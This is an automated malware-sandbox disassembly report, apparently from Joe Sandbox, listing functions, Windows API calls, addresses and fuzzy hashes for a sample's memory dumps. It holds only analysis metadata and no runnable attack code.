                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2701053895-0
                                                                                                                                                                                                                                                                          • Opcode ID: c11ba3e396304a0a8eb352462ea2a8f3e431145970533a5da60f64663d0b9ab5
                                                                                                                                                                                                                                                                          • Instruction ID: 087ea48a75e0a0381dbea93df14a2aaedf26f860404555e443b330bd1cea42bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11ba3e396304a0a8eb352462ea2a8f3e431145970533a5da60f64663d0b9ab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C516575900219AFDF10BF6C8C85ABE77A9FF85318F1841ADF809D3201FA309D52AB64
                                                                                                                                                                                                                                                                          Function 00889B40 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                          • Opcode ID: e4d4ae94105fe7f06cf11f4e34f937fada5231fd014bdee0e7b26ef7610fb708
                                                                                                                                                                                                                                                                          • Instruction ID: c67d379ccc1ede794faa8c811c0b3ac98d564f6e815f1a2b6dcd30074709c250
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4d4ae94105fe7f06cf11f4e34f937fada5231fd014bdee0e7b26ef7610fb708
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8C1AA7090060A8FCB24EFA8C9846BABBF2FF45324F1C4A19E4D6D7691D732AD45CB51
                                                                                                                                                                                                                                                                          Function 00895C0C Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00895C60
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: c57dc30922587d5a897c6d37c101283967dce62e6ce83571f671a12f217158ee
                                                                                                                                                                                                                                                                          • Instruction ID: 6ca12c5bfcb96d672c3b39eef47f421b1c2e6129ca1f3e32130cd1f8ce4b9959
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c57dc30922587d5a897c6d37c101283967dce62e6ce83571f671a12f217158ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA21807261170AABEF29BB29DD51A7A73A8FF44318B18006AF901D6281EB75AD40CB51
                                                                                                                                                                                                                                                                          Function 00888741 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                          • Opcode ID: 813342d7e0dbb64637d6cfd0a725b1b27744ca2f7a81b493813f544d7e954f48
                                                                                                                                                                                                                                                                          • Instruction ID: 7360abcc1cef5485a7def42eafbe32a18c60d2e63afc1e888e968278eff7a161
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 813342d7e0dbb64637d6cfd0a725b1b27744ca2f7a81b493813f544d7e954f48
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB1917090061BCBCB28FE6889556BEBBB1FF44304FD40629D592E7691DF35AE01CB52
                                                                                                                                                                                                                                                                          Function 008958BF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0089595A,00000001,00000000,?,-00000050,?,0089574A,00000000,-00000002,00000000,?,00000055,?), ref: 00895931
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9742e4afa2d536500ac32e70a3f587e667ce98f604a0821c302f0dec1a11c0f5
                                                                                                                                                                                                                                                                          • Instruction ID: 48e6063e4737a8445b3684c762c5cea2a8d5edba5da16c1c0236695ed19968b7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9742e4afa2d536500ac32e70a3f587e667ce98f604a0821c302f0dec1a11c0f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5511293B2007019FEF18AF39D8A157ABB91FF84329B18442DE98687A40D7717803CB40
                                                                                                                                                                                                                                                                          Function 00895D2C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00895D80
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: 35da8883df68a2cd635ae89ccdce00cadd484bfae932b73cef126d3deb3cb09b
                                                                                                                                                                                                                                                                          • Instruction ID: a4a5c426c5200e9ef106e7b4e913fe0736cd3f419f7e6d36a2830c40a4275d05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35da8883df68a2cd635ae89ccdce00cadd484bfae932b73cef126d3deb3cb09b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C811C672611606ABDF19BF68DC4AABA73ACFF45310B18007AF502D7181EB34ED05DB51
                                                                                                                                                                                                                                                                          Function 00895ED9 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00895B76,00000000,00000000,?), ref: 00895F05
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0d481968ef9179abc907d86287c5dc2352d08c8f5485a1bb5221dddf56e1c63a
                                                                                                                                                                                                                                                                          • Instruction ID: 34e933b079f8bd621bd3d173c237b80ce401f96cb0953f94f5aa7972d7b692a5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d481968ef9179abc907d86287c5dc2352d08c8f5485a1bb5221dddf56e1c63a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1701D132A04516BBDF296A65CC4ABBA3769FB40764F194468EC42F3180EE70FE41CB90
                                                                                                                                                                                                                                                                          Function 00895BAD Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00895C0C,00000001,?,?,-00000050,?,00895712,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00895BF7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: fc9d6b83d606386fdd04f9a0eb13a60e102b29a3101ea9026828cb25c5679dda
                                                                                                                                                                                                                                                                          • Instruction ID: 69b853438015e36390b33dc2e06cc24a2da88006475c4fa16057a4531d580ba8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc9d6b83d606386fdd04f9a0eb13a60e102b29a3101ea9026828cb25c5679dda
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0C2363047045FDF256F79D881A6ABB91FB81768B09842DF946CBA80D7B1AC01CB54
                                                                                                                                                                                                                                                                          Function 008916A7 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0088D047: EnterCriticalSection.KERNEL32(?,?,0088A841,00000000,008AB3D8,0000000C,0088A7FA,00001000,?,008917CA,00001000,?,008908B1,00000001,00000364,?), ref: 0088D056
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0089169A,00000001,008AB7F0,0000000C,008910A8,-00000050), ref: 008916DF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: de2f9c06a8f2273b3d114770aa892937194fd4d0188a2e9910e036e3b1de5827
                                                                                                                                                                                                                                                                          • Instruction ID: d385f7655aed15b6db929091b88502656246223b8a03835ff5bcd45c231a4b4d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de2f9c06a8f2273b3d114770aa892937194fd4d0188a2e9910e036e3b1de5827
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF03C3AA04205DFEB11EF98E806B5D77B0FB45720F10812AE510DB7A2D7799900CF51
                                                                                                                                                                                                                                                                          Function 00895CE1 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00895D2C,00000001,?,?,?,0089576C,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00895D18
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: d58bdd3a5109c1e10f2094d2a9e04e8ca5cdbb2ac54ba1b8875ed86999c1445b
                                                                                                                                                                                                                                                                          • Instruction ID: bfd8475b42133407bdf43960b44893ea5f3a7f73157687fc3af665c5b609f345
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d58bdd3a5109c1e10f2094d2a9e04e8ca5cdbb2ac54ba1b8875ed86999c1445b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0553A30020867CF05AF39D80966ABF90FFC2720B0A4068EE05CB690C3759842CB90
                                                                                                                                                                                                                                                                          Function 008911AC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0088BDA3,?,20001004,00000000,00000002,?,?,0088ACB5), ref: 008911E0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                          • Opcode ID: a7e2687a5ae96d64bc131e6b73e81f2852ede5f68471b2e060a1c16fe663e1a4
                                                                                                                                                                                                                                                                          • Instruction ID: 20f72a5319af683685ebb0542a9a7fc9b69836657be16bda914d0321765487bb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e2687a5ae96d64bc131e6b73e81f2852ede5f68471b2e060a1c16fe663e1a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E04F31904119BBCF163FA1DC0CAAE3E26FF44760F494011FD06A5A60CB328921EA96
                                                                                                                                                                                                                                                                          Function 00884067 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00014188), ref: 0088406C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
